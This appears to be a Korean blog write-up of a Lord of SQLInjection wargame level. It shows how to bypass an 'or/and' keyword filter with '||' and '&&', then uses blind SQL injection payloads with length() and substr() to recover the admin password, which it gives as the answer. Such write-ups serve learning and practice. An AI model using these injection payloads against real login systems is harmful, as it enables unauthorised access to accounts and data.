:: 문제풀이
if(preg_match ('/or|and/i', $_GET [pw ])) exit("HeHe");
여기도 마찬가지로 or과 and를 사용할 수 없게 되어있다.
?pw=%27%20||%20length(pw)>5%23
이걸 사용했더니 hello guest가 떠서 5이상의 숫자를 넣어보았다.
?pw=%27%20||%20length(pw)=8%23
여기서 hello admin이 떠서 pw의 길이가 8이라는 것을 알아내었다.
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,1,1)=6%23
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,2,1)=%27c
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,3,1)=%278
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,4,1)=6%23
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,5,1)=4%23
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,6,1)=%27d
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,7,1)=%27e
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,8,1)=%27c
를 하나하나 대입해보고 pw=6c864dec라는 것을 알아내었다.
?pw=%27%20||%20id=%27admin%27%26%26substr(pw,6,1)=0%23 일 때, hello admin이 나오면 숫자대신 알파벳을 대입하였다.
구글링해보니 파이썬으로 하는 것도 있었는데 방법을 몰라 이렇게 했다.
::답
?pw=6c864dec
'computer > LOS' 카테고리의 다른 글
| LOS 2.cobolt 풀이 (난이도 최하) (0) | 2020.08.26 |
|---|---|
| LOS 6.DARKELF 풀이 (난이도 하) (0) | 2019.11.05 |
| LOS 5.wolfman 풀이 (난이도 하..?) (0) | 2019.11.05 |
| Lord of the SQL 사이트 (0) | 2019.11.05 |
댓글